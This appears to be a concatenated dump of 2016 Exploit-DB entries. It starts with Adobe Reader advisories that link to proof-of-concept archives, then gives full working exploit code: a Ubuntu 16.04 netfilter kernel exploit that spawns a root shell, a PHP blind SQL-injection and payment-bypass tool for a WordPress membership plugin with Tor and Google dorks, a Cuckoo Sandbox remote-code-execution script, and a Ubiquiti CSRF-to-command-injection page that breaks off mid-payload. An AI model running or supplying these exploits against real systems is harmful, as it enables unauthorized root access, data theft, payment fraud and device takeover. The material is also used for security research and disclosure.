https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40099.zip
####################################################################################
#####################################################################################
# Application: Adobe Acrobat Reader DC
# Platforms: Windows,OSX
# Versions: 15.016.20045 and earlier
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE: CVE-2016-4203
# COSIG-2016-28
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).
(https://en.wikipedia.org/wiki/Adobe_Acrobat)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-18: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe fixed the issue (APSB16-26);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction
that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data.
#####################################################################################
===========
4) POC
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-28.pdf
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40097.zip
####################################################################################
#####################################################################################
# Application: Adobe Acrobat Reader DC
# Platforms: Windows,OSX
# Versions: 15.016.20045 and earlier
# Author: Sébastien Morin and Pier-Luc Maltais of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE: CVE-2016-4204
# COSIG-2016-29
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).
(https://en.wikipedia.org/wiki/Adobe_Acrobat)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-18: Sébastien Morin and Pier-Luc Maltais of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe fixed the issue (APSB16-26);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction
that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data.
#####################################################################################
===========
4) POC
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-29.pdf
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40096.zip
####################################################################################
#####################################################################################
# Application: Adobe Acrobat Reader DC
# Platforms: Windows,OSX
# Versions: 15.016.20045 and earlier
# Author: Sébastien Morin and Pier-Luc Maltais of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE: CVE-2016-4205
# COSIG-2016-30
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).
(https://en.wikipedia.org/wiki/Adobe_Acrobat)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-18: Sébastien Morin and Pier-Luc Maltais of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe fixed the issue (APSB16-26);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction
that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data.
#####################################################################################
===========
4) POC
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-30.pdf
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40095.zip
####################################################################################
/*
Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40053.zip
*/
--------------------------------------------------- decr.c ---------------------------------------------------
/**
* Ubuntu 16.04 local root exploit - netfilter target_offset OOB
* check_compat_entry_size_and_hooks/check_entry
*
* Tested on 4.4.0-21-generic. SMEP/SMAP bypass available in descr_v2.c
*
* Vitaly Nikolenko
* vnik@cyseclabs.com
* 23/04/2016
*
*
* ip_tables.ko needs to be loaded (e.g., iptables -L as root triggers
* automatic loading).
*
* vnik@ubuntu:~$ uname -a
* Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
* vnik@ubuntu:~$ gcc decr.c -m32 -O2 -o decr
* vnik@ubuntu:~$ gcc pwn.c -O2 -o pwn
* vnik@ubuntu:~$ ./decr
* netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik
* [!] Decrementing the refcount. This may take a while...
* [!] Wait for the "Done" message (even if you'll get the prompt back).
* vnik@ubuntu:~$ [+] Done! Now run ./pwn
*
* vnik@ubuntu:~$ ./pwn
* [+] Escalating privs...
* root@ubuntu:~# id
* uid=0(root) gid=0(root) groups=0(root)
* root@ubuntu:~#
*
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sched.h>
#include <linux/sched.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ptrace.h>
#include <netinet/in.h>
#include <net/if.h>
#include <linux/netfilter_ipv4/ip_tables.h>
#include <linux/netlink.h>
#include <fcntl.h>
#include <sys/mman.h>
#define MALLOC_SIZE 66*1024
int check_smaep() {
FILE *proc_cpuinfo;
char fbuf[512];
proc_cpuinfo = fopen("/proc/cpuinfo", "r");
if (proc_cpuinfo < 0) {
perror("fopen");
return -1;
}
memset(fbuf, 0, sizeof(fbuf));
while(fgets(fbuf, 512, proc_cpuinfo) != NULL) {
if (strlen(fbuf) == 0)
continue;
if (strstr(fbuf, "smap") || strstr(fbuf, "smep")) {
fclose(proc_cpuinfo);
return -1;
}
}
fclose(proc_cpuinfo);
return 0;
}
int check_mod() {
FILE *proc_modules;
char fbuf[256];
proc_modules = fopen("/proc/modules", "r");
if (proc_modules < 0) {
perror("fopen");
return -1;
}
memset(fbuf, 0, sizeof(fbuf));
while(fgets(fbuf, 256, proc_modules) != NULL) {
if (strlen(fbuf) == 0)
continue;
if (!strncmp("ip_tables", fbuf, 9)) {
fclose(proc_modules);
return 0;
}
}
fclose(proc_modules);
return -1;
}
int decr(void *p) {
int sock, optlen;
int ret;
void *data;
struct ipt_replace *repl;
struct ipt_entry *entry;
struct xt_entry_match *ematch;
struct xt_standard_target *target;
unsigned i;
sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW);
if (sock == -1) {
perror("socket");
return -1;
}
data = malloc(MALLOC_SIZE);
if (data == NULL) {
perror("malloc");
return -1;
}
memset(data, 0, MALLOC_SIZE);
repl = (struct ipt_replace *) data;
repl->num_entries = 1;
repl->num_counters = 1;
repl->size = sizeof(*repl) + sizeof(*target) + 0xffff;
repl->valid_hooks = 0;
entry = (struct ipt_entry *) (data + sizeof(struct ipt_replace));
entry->target_offset = 74; // overwrite target_offset
entry->next_offset = sizeof(*entry) + sizeof(*ematch) + sizeof(*target);
ematch = (struct xt_entry_match *) (data + sizeof(struct ipt_replace) + sizeof(*entry));
strcpy(ematch->u.user.name, "icmp");
void *kmatch = (void*)mmap((void *)0x10000, 0x1000, 7, 0x32, 0, 0);
uint64_t *me = (uint64_t *)(kmatch + 0x58);
*me = 0xffffffff821de10d; // magic number!
uint32_t *match = (uint32_t *)((char *)&ematch->u.kernel.match + 4);
*match = (uint32_t)kmatch;
ematch->u.match_size = (short)0xffff;
target = (struct xt_standard_target *)(data + sizeof(struct ipt_replace) + 0xffff + 0x8);
uint32_t *t = (uint32_t *)target;
*t = (uint32_t)kmatch;
printf("[!] Decrementing the refcount. This may take a while...\n");
printf("[!] Wait for the \"Done\" message (even if you'll get the prompt back).\n");
for (i = 0; i < 0xffffff/2+1; i++) {
ret = setsockopt(sock, SOL_IP, IPT_SO_SET_REPLACE, (void *) data, 66*1024);
}
close(sock);
free(data);
printf("[+] Done! Now run ./pwn\n");
return 0;
}
int main(void) {
void *stack;
int ret;
printf("netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik\n");
if (check_mod()) {
printf("[-] No ip_tables module found! Quitting...\n");
return -1;
}
if (check_smaep()) {
printf("[-] SMEP/SMAP support dectected! Quitting...\n");
return -1;
}
ret = unshare(CLONE_NEWUSER);
if (ret == -1) {
perror("unshare");
return -1;
}
stack = (void *) malloc(65536);
if (stack == NULL) {
perror("malloc");
return -1;
}
clone(decr, stack + 65536, CLONE_NEWNET, NULL);
sleep(1);
return 0;
}
--------------------------------------------------- pwn.c ---------------------------------------------------
/**
* Run ./decr first!
*
* 23/04/2016
* - vnik
*/
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <stdint.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <assert.h>
#define MMAP_ADDR 0xff814e3000
#define MMAP_OFFSET 0xb0
typedef int __attribute__((regparm(3))) (*commit_creds_fn)(uint64_t cred);
typedef uint64_t __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(uint64_t cred);
void __attribute__((regparm(3))) privesc() {
commit_creds_fn commit_creds = (void *)0xffffffff810a21c0;
prepare_kernel_cred_fn prepare_kernel_cred = (void *)0xffffffff810a25b0;
commit_creds(prepare_kernel_cred((uint64_t)NULL));
}
int main() {
void *payload = (void*)mmap((void *)MMAP_ADDR, 0x400000, 7, 0x32, 0, 0);
assert(payload == (void *)MMAP_ADDR);
void *shellcode = (void *)(MMAP_ADDR + MMAP_OFFSET);
memset(shellcode, 0, 0x300000);
void *ret = memcpy(shellcode, &privesc, 0x300);
assert(ret == shellcode);
printf("[+] Escalating privs...\n");
int fd = open("/dev/ptmx", O_RDWR);
close(fd);
assert(!getuid());
printf("[+] We've got root!");
return execl("/bin/bash", "-sh", NULL);
}
<?php
/**
* Exploit Title: Ultimate Membership Pro WordPress Plugin Exploit
* Google Dorks: inurl:"lid=0" OR inurl:"lid=1" ... inurl:"lid=100" "Register" "Confirm Password"
* Exploit Author: wp0Day.com <contact@wp0day.com>
* Vendor Homepage: http://wpindeed.com/
* Software Link: http://codecanyon.net/item/ultimate-membership-pro-wordpress-plugin/12159253
* Version: 3.3
* Tested on: Debian 8, PHP 5.6.17-3
* Type: Unauthenticated Blind SQLi, Unauthenticated Payment Bypass
* Time line: Found [07-Jun-2016], Vendor notified [08-Jun-2016], Vendor fixed: [Yes], [RD:1466846149]
*/
require_once('curl.php');
//OR
//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php');
$curl = new CurlWrapper();
$options = getopt("t:m:l:e:s:",array('tor:'));
print_r($options);
$options = validateInput($options);
if (!$options){
showHelp();
}
if ($options['tor'] === true)
{
echo " ### USING TOR ###\n";
echo "Setting TOR Proxy...\n";
$curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/");
$curl->addOption(CURLOPT_PROXYTYPE,7);
echo "Checking IPv4 Address\n";
$curl->get('https://dynamicdns.park-your-domain.com/getip');
echo "Got IP : ".$curl->getResponse()."\n";
echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
$answer = fgets(fopen ("php://stdin","r"));
if(trim($answer) != 'wololo'){
die("Aborting!\n");
}
echo "OK...\n";
}
function isTrue($sql){
global $curl, $options;
$levels = "') union all select (SELECT CASE WHEN ($sql) then 1 else 1*(select table_name from information_schema.tables) end)#";
$data = array(
'action'=>'ihc_preview_user_listing',
'shortcode'=>'[ihc-list-users filter_by_level="1" levels_in="'.$levels.'" theme="ihc-theme_1" ]'
);
$curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
$resp = $curl->getResponse();
return preg_match('~ihc_public_list_users_(\d+)~',$resp);
}
function exploit(){
global $curl, $options;
if ($options['m'] == 'pay'){
$level = $options['l'];
for($i=$options['s']; $i<$options['e']; $i++){
//This is mental, no IP or Hash check!
echo "Paying Level $level to UserID: $i\n";
$data = array('x_MD5_Hash'=>'1', 'x_response_code'=>'1', 'x_cust_id'=>$i, 'x_po_num'=>$level);
$curl->post($options['t'].'wp-content/plugins/indeed-membership-pro/authorize_response.php', $data);
//echo $curl->getResponse();
}
}
if ($options['m'] == 'sql'){
$query = $options['s'];
echo "'Running' SQL Query: $query\n";
echo "Getting Length";
$max_length = 100;
//Well, it is messed up, can use , (comma) in the query
//Binary search or divide et impera is possible with the BETWEEN operator
//Code it yourself :)
$len = 0;
for ($i=1;$i<$max_length;$i++){
$sql_len = "(select char_length( ($query) ) = $i )";
if (isTrue($sql_len)){
echo "\nLength found: $i\n";
$len = $i;
break;
} else {
echo ".";
}
}
if ($len !== 0 ){
echo "Reading char by char\nResponse:\n";
} else {
die("Failed getting length!\nAboring.\n\n");
}
$charset = 'etaoinsrhdluc@*1234567890.mfywgpbvkxqjzETAOINSRHDLUCMFYWGPBVKXQJZ';
for ($i=1;$i<$len;$i++){
$got = false;
for ($j=0;$j<strlen($charset);$j++){
$chr = $charset[$j];
$question = "SELECT substr(($query) FROM $i FOR 1) = '$chr' ";
if (isTrue($question)){
echo $charset[$j];
$got = true;
break;
}
}
if (!$got){
echo "?";
}
}
echo "\n\n";
}
}
exploit();
function validateInput($options){
if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){
return false;
}
if (!isset($options['m']) || !in_array($options['m'], array('sql', 'pay') ) ){
return false;
}
if ($options['m'] == 'sql' && !isset($options['s'])) {
return false;
}
if ($options['m'] == 'pay' && ( !isset($options['s']) || !isset($options['e']) || !isset($options['l']))) {
return false;
}
if ($options['m'] == 'pay' && ( !is_numeric($options['s']) || !is_numeric($options['e']) || !is_numeric($options['l']) )) {
echo "In pay mode -s -e and -l must be numeric!\n";
return false;
}
$options['tor'] = isset($options['tor']);
return $options;
}
function showHelp(){
global $argv;
$help = <<<EOD
Ultimate Membership Pro 8.4.1.3 WordPress Plugin Exploit
Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -m [MODE] -s [QUERY] -s [START] -e [END] -l [LEVEL]
[MODE] sql - Blind SQL Inject mode*
pay - Payment bypass. Parameters -l Level ID (&lid=XX in the url), -s Start UserID, -e End UserID
*Note: You can't use , (comma) in the query.
Examples:
php $argv[0] -t http://localhost/ --tor=yes -m sql -s 'select user()'
php $argv[0] -t http://localhost/ --tor=yes -m pau -s 0 -e 1000 -l 1
Marks all users with UserID between 0 and 1000 as paying customer for level ID 1
Misc:
CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru>
@link http://github.com/svyatov/CurlWrapper
@license http://www.opensource.org/licenses/mit-license.html MIT License
EOD;
echo $help."\n\n";
die();
}
# -*- coding: utf8 -*-
"""
# Exploit Title: Cuckoo Sandbox Guest XMLRPC Privileged RCE PoC
# Date: June 28th 2016
# Exploit Author: Rémi ROCHER
# Vendor Homepage: https://cuckoosandbox.org/
# Software Link: https://github.com/cuckoosandbox/cuckoo/archive/master.zip
# Version: <= 2.0.1
# Tested on: MS Windows 7, MS Windows 10 (With & without UAC)
# CVE : None
--[ NAME
Cuckoo Sandbox Guest XMLRPC Privileged RCE PoC
--[ DESCRIPTION
Cuckoo Sandbox is Free Software, basically used by researchers to analyze
(potential) malware behavior. It is also implemented industrially by
private companies for detecting potential threats within IT Networks
featuring dedicated so-called security appliances.
This basic Proof of Concept exploit is spawning a calc.exe process with
Administrator privileges, assuming:
* The Cuckoo agent.py is running with Admin privileges (should be
the case)
* The current user can access a local interface (should be the case)
* Optional for true Remote Code Execution: External equipment can
access the XMLRPC port (default 8000).
One may also call the complete() method in order to stop any further
detection
or screenshot.
Such vulnerabilities can be used to either trick the very detection
system, or
potentially escape the sandbox machine itself. An attacker could also
exploit
such bugs as a pivot in order to attack sensitive systems.
--[ AUTHORS
* Rémi ROCHER - Armature Technologies
* Thomas MARTHÉLY- Armature Technologies
--[ RESOURCE
* Repository: https://github.com/cuckoosandbox/cuckoo
"""
import xmlrpclib
from StringIO import StringIO
from zipfile import ZipFile, ZipInfo, ZIP_STORED, ZIP_DEFLATED
def execute(x, cmd="cmd /c start"):
output = StringIO()
file = ZipFile(output, "w", ZIP_STORED)
info = ZipInfo("analyzer.py")
info.compress_type = ZIP_DEFLATED
content = ("""
import subprocess
if __name__ == "__main__":
subprocess.Popen("%s",stdout=subprocess.PIPE,stderr=subprocess.PIPE)
""" % cmd)
file.writestr(info, content)
file.close()
data = xmlrpclib.Binary(output.getvalue())
if x.add_analyzer(data):
return x.execute()
if __name__ == "__main__":
x = xmlrpclib.ServerProxy("http://localhost:8000")
execute(x, "calc.exe")
# x.complete() # Blackout mode
<!--
KL-001-2016-002 : Ubiquiti Administration Portal CSRF to Remote Command Execution
Title: Ubiquiti Administration Portal CSRF to Remote Command Execution
Advisory ID: KL-001-2016-002
Publication Date: 2016.06.28
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-002.txt
1. Vulnerability Details
Affected Vendor: Ubiquiti
Affected Product: AirGateway, AirFiber, mFi
Affected Version: 1.1.6, 3.2, 2.1.11
Platform: Embedded Linux
CWE Classification: CWE-352: Cross-Site Request Forgery (CSRF);
CWE-77: Improper Neutralization of Special Elements
used in a Command ('Command Injection')
Impact: Arbitrary Code Execution
Attack vector: HTTP
2. Vulnerability Description
The Ubiquiti AirGateway, AirFiber and mFi platforms feature
remote administration via an authenticated web-based portal.
Lack of CSRF protection in the Remote Administration Portal,
and unsafe passing of user input to operating system commands
exectuted with root privileges, can be abused in a way that
enables remote command execution.
3. Technical Description
The firmware files analyzed were
AirGWP.v1.1.6.28062.150731.1520.bin, AF24.v3.2.bin, and
firmware.bin respectively.
The MD5 hash values for the vulnerable files served by the
administration portal are:
AirGateway b45fe8e491d62251f0a7a100c636178a /usr/www/system.cgi
AirFiber d8926f7f65a2111f4036413f985082b9 /usr/www/system.cgi
mFi 960e8f6e507b227dbc4b65fc7a7036bc /usr/www/system.cgi
The firmware file contains a LZMA compressed, squashfs
partition. The binaries running on the embedded device are
compiled for a MIPS CPU. The device can be easily virtualized
using QEMU:
Example: sudo /usr/sbin/chroot . ./qemu-mips-static /usr/sbin/lighttpd
-f /etc/lighttpd/lighttpd.conf
The administration portal does not issue a randomized CSRF
token either per session, page, or request. Administration
authorization is solely based on cookie control. Therefore,
it is possible to embed JavaScript into an HTML page so when
an administrator is socially engineered into visiting the page,
the target device will be accessed with privileges.
Device configuration POST parameters include tokens passed to
operating system commands run as root in unsafe ways with
insufficient input sanitization. Command injection is possible
by stacking shell commands in parameters such as
iptables.1.cmd.
In order for a developer to recreate this discovery, the
following instructions should be duplicated.
a. Authenticate to the target web application and navigate to the
SYSTEM page.
b. Download the current configuration.
c. Open the configuration in an editor of your choice, navigate to the
line containing: iptables.1.cmd=-A FIREWALL -j ACCEPT
d. Append the following onto that line: ;touch /var/tmp/csrf-to-rce.txt
e. Save the changes, and submit the modified configuration. Apply the
changes using apply.cgi afterward.
Example:
POST /system.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:43.0)
Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;
q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://192.168.1.1/system.cgi
Cookie: ui_language=en_US; last_check=1452020493426;
AIROS_SESSIONID=e5f61a5c0a9d0690b4efd484e56b8c93
Connection: keep-alive
Content-Type: multipart/form-data;
boundary=---------------------------4384928471732886672453075690
Content-Length: 7204
...
iptables.1.cmd=-A FIREWALL -j ACCEPT; touch /var/tmp/csrf-to-rce.txt
...
GET /apply.cgi?testmode=&_=[redacted] HTTP/1.1
Host: 192.168.1.1
X-Requested-With: XMLHttpRequest
Referer: https://192.168.1.1/system.cgi
Cookie: ui_language=en_US; last_check=1452020493426;
AIROS_SESSIONID=e5f61a5c0a9d0690b4efd484e56b8c93
Connection: keep-alive
f. Change your IP address, but ensure continued routing to the target web
application. Incrementing the last octet is sufficient.
g. Open the configuration in an editor of your choice, navigate to the
modified line and alter it: ;touch /var/tmp/csrf-to-rce-newsrc.txt
h. Repeat step 5 from the new IP address. You will receive the same
response. Apply the changes using the apply.cgi file.
i. Login to the target device using SSH or telnet, navigate to /var/tmp
and type ls.
j. You'll discover both files exist.
4. Mitigation and Remediation Recommendation
At this time there is no vendor patch for this vulnerability.
The vendor was unable or unwilling to communicate an expected release
date for a proper mitigation.
5. Credit
This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc.
6. Disclosure Timeline
2016.02.25 - KoreLogic sends vulnerability report and PoC to Ubiquiti.
2016.02.26 - Ubiquiti acknowledges receipt of vulnerability report.
2016.04.12 - 30 business days have elapsed since the vulnerability was
reported to Ubiquiti.
2016.04.21 - KoreLogic asks for an update on the remediation effort.
2016.04.29 - Ubiquiti replies that the patch will require
"significant changes" but does not provide an estimate
of the release time table.
2016.05.04 - 45 business days have elapsed since the vulnerability was
reported to Ubiquiti.
2016.05.12 - KoreLogic requests an update from Ubiquiti.
2016.05.23 - KoreLogic requests an update from Ubiquiti.
2016.06.23 - 80 business days have elapsed since the vulnerability was
reported to Ubiquiti.
2016.06.28 - Public disclosure.
7. Proof of Concept
########################################################################
#
# Copyright 2016 KoreLogic Inc., All Rights Reserved.
#
# This proof of concept, having been partly or wholly developed
# and/or sponsored by KoreLogic, Inc., is hereby released under
# the terms and conditions set forth in the Creative Commons
# Attribution Share-Alike 4.0 (United States) License:
#
# http://creativecommons.org/licenses/by-sa/4.0/
#
#######################################################################*
This example has been performed against the AirGateway device running the
1.1.6 firmware version. In order to recreate this vulnerability on
AirFiber and mFi, the attacker should first obtain a valid copy of the
device configuration and update this proof-of-concept code.
-->
<html>
<body>
<form action="https://192.168.1.1/apply.cgi" id="airos-exploit-apply">
<input type="submit" value="Submit request" />
</form>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://192.168.1.1/system.cgi", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------761818923593135447208368355");
xhr.withCredentials = true;
var body = "-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"fwfile\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"action\"\r\n" +
"\r\n" +
"fwupload\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"update_status\"\r\n" +
"\r\n" +
"enabled\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"hostname\"\r\n" +
"\r\n" +
"airGateway\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"timezone\"\r\n" +
"\r\n" +
"GMT\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"ui_language\"\r\n" +
"\r\n" +
"en_US\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"adminname\"\r\n" +
"\r\n" +
"ubnt\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"latitude\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"longitude\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"longitude\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"cfgfile\"; filename=\"hacked.cfg\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"aaa.1.radius.acct.1.status=disabled\n" +
"wpasupplicant.status=disabled\n" +
"wpasupplicant.device.1.status=disabled\n" +
"wireless.status=enabled\n" +
"wireless.1.wds.status=disabled\n" +
"wireless.1.wds.6.peer=\n" +
"wireless.1.wds.5.peer=\n" +
"wireless.1.wds.4.peer=\n" +
"wireless.1.wds.3.peer=\n" +
"wireless.1.wds.2.peer=\n" +
"wireless.1.wds.1.peer=\n" +
"wireless.1.status=enabled\n" +
"wireless.1.ssid=www.ubnt.com\n" +
"wireless.1.security.type=none\n" +
"wireless.1.scan_list.status=disabled\n" +
"wireless.1.mac_acl.policy=allow\n" +
"wireless.1.mac_acl.status=disabled\n" +
"wireless.1.hide_ssid=disabled\n" +
"wireless.1.devname=ath0\n" +
"wireless.1.autowds=disabled\n" +
"wireless.1.authmode=1\n" +
"wireless.1.ap=\n" +
"wireless.1.addmtikie=enabled\n" +
"vlan.status=disabled\n" +
"users.status=enabled\n" +
"users.1.status=enabled\n" +
"users.1.password=VvpvCwhccFv6Q\n" +
"users.1.name=ubnt\n" +
"upnpd.devname=\n" +
"upnpd.status=disabled\n" +
"tshaper.status=disabled\n" +
"telnetd.status=enabled\n" +
"telnetd.port=23\n" +
"system.modules.blacklist.status=disabled\n" +
"system.eirp.status=disabled\n" +
"system.cfg.version=65542\n" +
"syslog.status=disabled\n" +
"syslog.remote.status=\n" +
"sshd.status=enabled\n" +
"sshd.port=22\n" +
"sshd.auth.passwd=enabled\n" +
"snmp.status=disabled\n" +
"route.1.devname=eth0\n" +
"route.1.status=disabled\n" +
"route.1.comment=\n" +
"route.1.gateway=0.0.0.0\n" +
"route.1.netmask=0\n" +
"route.1.ip=0.0.0.0\n" +
"route.status=enabled\n" +
"resolv.nameserver.2.status=enabled\n" +
"resolv.nameserver.2.ip=\n" +
"resolv.nameserver.1.status=enabled\n" +
"resolv.nameserver.1.ip=\n" +
"resolv.status=disabled\n" +
"radio.status=enabled\n" +
"radio.countrycode=840\n" +
"radio.1.txpower=18\n" +
"radio.1.subsystemid=0xe4c2\n" +
"radio.1.status=enabled\n" +
"radio.1.reg_obey=disabled\n" +
"radio.1.rate.mcs=7\n" +
"radio.1.rate.auto=enabled\n" +
"radio.1.obey=disabled\n" +
"radio.1.mode=master\n" +
"radio.1.mcastrate=\n" +
"radio.1.low_txpower_mode=disabled\n" +
"radio.1.ieee_mode=11nght20\n" +
"radio.1.freq=0\n" +
"radio.1.forbiasauto=1\n" +
"radio.1.dfs.status=enabled\n" +
"radio.1.devname=ath0\n" +
"radio.1.cwm.mode=0\n" +
"radio.1.cwm.enable=0\n" +
"radio.1.countrycode=840\n" +
"radio.1.clksel=1\n" +
"radio.1.chanshift=\n" +
"radio.1.chanbw=0\n" +
"radio.1.antenna.id=4\n" +
"radio.1.acktimeout=25\n" +
"radio.1.ackdistance=600\n" +
"pwdog.status=enabled\n" +
"pwdog.retry=3\n" +
"pwdog.period=300\n" +
"pwdog.host=8.8.8.8\n" +
"pwdog.delay=300\n" +
"ppp.status=disabled\n" +
"ntpclient.status=enabled\n" +
"ntpclient.1.status=enabled\n" +
"ntpclient.1.server=0.ubnt.pool.ntp.org\n" +
"netmode=soho\n" +
"netconf.5.up=enabled\n" +
"netconf.5.hwaddr.mac=\n" +
"netconf.5.hwaddr.status=disabled\n" +
"netconf.5.autoip.status=disabled\n" +
"netconf.5.role=mlan\n" +
"netconf.5.mtu=1500\n" +
"netconf.5.devname=eth0\n" +
"netconf.5.status=disabled\n" +
"netconf.4.up=enabled\n" +
"netconf.4.netmask=255.255.255.0\n" +
"netconf.4.ip=0.0.0.0\n" +
"netconf.4.hwaddr.mac=\n" +
"netconf.4.hwaddr.status=disabled\n" +
"netconf.4.autoip.status=disabled\n" +
"netconf.4.role=bridge_port\n" +
"netconf.4.mtu=1500\n" +
"netconf.4.devname=eth1\n" +
"netconf.4.status=enabled\n" +
"netconf.3.up=enabled\n" +
"netconf.3.netmask=255.255.255.0\n" +
"netconf.3.ip=192.168.1.1\n" +
"netconf.3.hwaddr.mac=\n" +
"netconf.3.hwaddr.status=disabled\n" +
"netconf.3.autoip.status=disabled\n" +
"netconf.3.role=lan\n" +
"netconf.3.mtu=1500\n" +
"netconf.3.devname=br0\n" +
"netconf.3.status=enabled\n" +
"netconf.2.up=enabled\n" +
"netconf.2.promisc=enabled\n" +
"netconf.2.netmask=255.255.255.0\n" +
"netconf.2.ip=0.0.0.0\n" +
"netconf.2.hwaddr.mac=\n" +
"netconf.2.hwaddr.status=disabled\n" +
"netconf.2.autoip.status=disabled\n" +
"netconf.2.role=bridge_port\n" +
"netconf.2.mtu=1500\n" +
"netconf.2.devname=ath0\n" +
"netconf.2.status=enabled\n" +
"netconf.1.up=enabled\n" +
"netconf.1.promisc=enabled\n" +
"netconf.1.netmask=255.255.255.0\n" +
"netconf.1.ip=0.0.0.0\n" +
"netconf.1.hwaddr.mac=\n" +
"netconf.1.hwaddr.status=disabled\n" +
"netconf.1.autoip.status=disabled\n" +
"netconf.1.role=wan\n" +
"netconf.1.mtu=1500\n" +
"netconf.1.devname=eth0\n" +
"netconf.1.status=enabled\n" +
"netconf.status=enabled\n" +
"iptables.sys.upnpd.devname=\n" +
"iptables.sys.upnpd.status=disabled\n" +
"iptables.sys.status=enabled\n" +
"iptables.sys.portfw.status=disabled\n" +
"iptables.sys.mgmt.status=disabled\n" +
"iptables.sys.masq.1.status=enabled\n" +
